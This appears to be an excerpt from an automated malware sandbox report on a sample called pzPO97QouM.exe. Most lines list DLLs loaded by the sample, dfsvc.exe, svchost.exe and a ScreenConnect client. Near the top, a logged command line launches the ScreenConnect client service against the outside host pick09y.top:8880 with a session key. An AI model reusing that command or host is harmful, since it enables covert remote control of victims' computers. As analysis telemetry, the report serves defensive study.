                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "52c6258f-85a1-42d1-9479-cad4b97013ae" "User"
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
